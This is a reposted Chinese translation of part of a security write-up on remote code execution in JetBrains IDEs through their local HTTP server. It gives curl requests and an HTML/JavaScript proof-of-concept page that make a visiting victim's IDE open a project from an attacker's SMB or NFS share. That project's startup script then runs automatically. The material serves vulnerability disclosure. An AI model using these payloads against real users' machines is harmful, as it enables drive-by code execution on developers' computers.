IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

JetBrains IDE 远程代码执行和本地文件泄露 - 安全客 - 有思想的安全新媒体(5)

发布时间:2016-08-19 08:52文章来源:网络整理文章作者: 学习网点击次数:
WINDOWS 环境下攻击更加容易 上述用来打开 helpers目录的技巧只有在用户已经安装PyCharm 2016.1 的前提下成立,其他情况下还是需要猜测出项目名称。那么其他的JetBrains IDE(比如IntelliJ IDEA和Android Studio)


WINDOWS环境下攻击更加容易


上述用来打开 helpers目录的技巧只有在用户已经安装PyCharm 2016.1 的前提下成立,其他情况下还是需要猜测出项目名称。那么其他的JetBrains IDE(比如IntelliJ IDEA和Android Studio)工作情况怎么样呢?

  由于jetbrains://project/open处理程序允许我们通过任何路径传递项目,UNC路径又是一个很方便的选择。UNC 路径是 windows 的特定路径,允许用户在网络共享中引用文件。(类似于\\servername\sharename\filepath)。多数的windows文件API会很乐于选择UNC路径并且光明正大地连接到另一台电脑的SMB共享,这样就可以读取和写入远程文件。如果可以获得从SMB共享中打开项目的IDE,我们就不需要猜测受害者电脑上的项目名称了。

  出于测试的目的,我设置了一个远程的Samba示例,其中有未经身份验证的SMB共享(名叫anontesting),共享中有一个 JetBrains 项目,我们现在来尝试打开:

$ curl -v "http://127.0.0.1:63342/api/internal" --data '{"url": "jetbrains://whatever/open/\\\\smb.example.com\\anonshare\\testing"}'


  我们假定受害者的ISP不会阻止SMB出站通信,我们就可以从SMB共享中加载任意项目。


Windows下还有更糟的后果


我们似乎可以做一些更加有趣的事情,可以通过一个请求使得windows用户从我们的远程SMB共享中下载一个用做攻击的项目。

JetBrains 的IDE每一个项目都有一个启动任务的概念。在PyCharm中,项目加载时会自动运行Python脚本,这就相当于在Android Studio和IntelliJ IDEA 中运行.jar。在下面的示例中,我已经完成了这一点,当项目打开时将会在项目根目录中自动运行hax.py 脚本:

现在我们需要在项目根目录中添加一个hax.py文件:

import os
 
os.system("calc.exe")

我们将该项目放在匿名SMB共享中,然后我们会呈现给受害者加载恶意项目的页面:

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1:63342/api/internal", true);
xhr.send('{"url": "jetbrains://whatever/open/\\\\\\\\123.456.789.101\\\\anonshare\\\\testing"}');
</script>

只要受害者导航到该页面,我们的有效荷载和计算器就会被触发:

OSX也难逃魔爪



在这片文章最初发表之后,纽约商品交易所(COMEX)指出,OSX会在用户通过 /net autofs 挂载点访问时自动安装远程 NFS 共享。这就意味着利用OSX下的RCE就类似于利用WINDOWS下的IDE。我们创建一个匿名NFS共享并打开/net/<hostname>/<sharename>/<projectname>:

$ curl -v "http://127.0.0.1:63342/api/internal" --data '{"url": "jetbrains://whatever/open//net/nfs.example.com/anonshare/testing"}'


在HTML PoC看到了这个:


JetBrains IDE 远程代码执行和本地文件泄露 - 安全客 - 有思想的安全新媒体(5)
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/others/jiami/411978.html

标签分类:

JetBrain
上一篇:上一篇:使用EVENTVWR.EXE和注册表劫持实现“无文件”UAC绕过 - 安全客 - 有思想的安全新媒体
下一篇: 下一篇:Address Sanitizer in macOS - 安全客 - 有思想的安全新媒体
无觅关联推荐,快速提升流量